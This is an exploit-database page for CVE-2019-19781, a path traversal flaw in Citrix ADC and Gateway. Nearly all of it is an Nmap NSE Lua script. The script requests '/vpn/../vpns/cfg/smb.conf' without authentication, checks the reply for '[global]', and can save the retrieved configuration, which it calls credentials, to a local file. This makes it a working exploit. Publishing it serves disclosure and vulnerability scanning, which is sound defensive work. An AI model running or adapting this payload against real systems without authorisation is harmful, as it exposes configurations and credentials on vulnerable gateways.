Citrix ADC / Gateway Path Traversal

2020.01.17
Credit: Mishra Dhiraj
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2019-19781
CWE: CWE-22


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Path Traversal in Citrix Application Delivery Controller (ADC) and Gateway. # Date: 17-12-2019 # CVE: CVE-2019-19781 # Vulenrability: Path Traversal # Vulnerablity Discovery: Mikhail Klyuchnikov # Exploit Author: Dhiraj Mishra # Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0 # Vendor Homepage: https://www.citrix.com/ # References: https://support.citrix.com/article/CTX267027 # https://github.com/nmap/nmap/pull/1893 local http = require "http" local stdnse = require "stdnse" local shortport = require "shortport" local table = require "table" local string = require "string" local vulns = require "vulns" local nmap = require "nmap" local io = require "io" description = [[ This NSE script checks whether the traget server is vulnerable to CVE-2019-19781 ]] --- -- @usage -- nmap --script https-citrix-path-traversal -p <port> <host> -- nmap --script https-citrix-path-traversal -p <port> <host> --script-args output='file.txt' -- @output -- PORT STATE SERVICE -- 443/tcp open http -- | CVE-2019-19781: -- | Host is vulnerable to CVE-2019-19781 -- @changelog -- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj) -- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__) -- @xmloutput -- <table key="NMAP-1"> -- <elem key="title">Citrix ADC Path Traversal aka (Shitrix)</elem> -- <elem key="state">VULNERABLE</elem> -- <table key="description"> -- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path -- traversal vulnerability that allows attackers to read configurations or any other file. -- </table> -- <table key="dates"> -- <table key="disclosure"> -- <elem key="year">2019</elem> -- <elem key="day">17</elem> -- <elem key="month">12</elem> -- </table> -- </table> -- <elem key="disclosure">17-12-2019</elem> -- <table key="extra_info"> -- </table> -- <table key="refs"> -- <elem>https://support.citrix.com/article/CTX267027</elem> -- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem> -- </table> -- </table> author = "Dhiraj Mishra (@RandomDhiraj)" Discovery = "Mikhail Klyuchnikov (@__Mn1__)" license = "Same as Nmap--See https://nmap.org/book/man-legal.html" categories = {"discovery", "intrusive","vuln"} portrule = shortport.ssl action = function(host,port) local outputFile = stdnse.get_script_args(SCRIPT_NAME..".output") or nil local vuln = { title = 'Citrix ADC Path Traversal', state = vulns.STATE.NOT_VULN, description = [[ Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path traversal vulnerability that allows attackers to read configurations or any other file. ]], references = { 'https://support.citrix.com/article/CTX267027', 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781', }, dates = { disclosure = {year = '2019', month = '12', day = '17'}, }, } local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) local path = "/vpn/../vpns/cfg/smb.conf" local response local output = {} local success = "Host is vulnerable to CVE-2019-19781" local fail = "Host is not vulnerable" local match = "[global]" local credentials local citrixADC response = http.get(host, port.number, path) if not response.status then stdnse.print_debug("Request Failed") return end if response.status == 200 then if string.match(response.body, match) then stdnse.print_debug("%s: %s GET %s - 200 OK", SCRIPT_NAME,host.targetname or host.ip, path) vuln.state = vulns.STATE.VULN citrixADC = (("Path traversal: https://%s:%d%s"):format(host.targetname or host.ip,port.number, path)) if outputFile then credentials = response.body:gsub('%W','.') vuln.check_results = stdnse.format_output(true, citrixADC) vuln.extra_info = stdnse.format_output(true, "Credentials are being stored in the output file") file = io.open(outputFile, "a") file:write(credentials, "\n") else vuln.check_results = stdnse.format_output(true, citrixADC) end end elseif response.status == 403 then stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, host.targetname or host.ip, path, response.status) vuln.state = vulns.STATE.NOT_VULN end return vuln_report:make_output(vuln) end


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top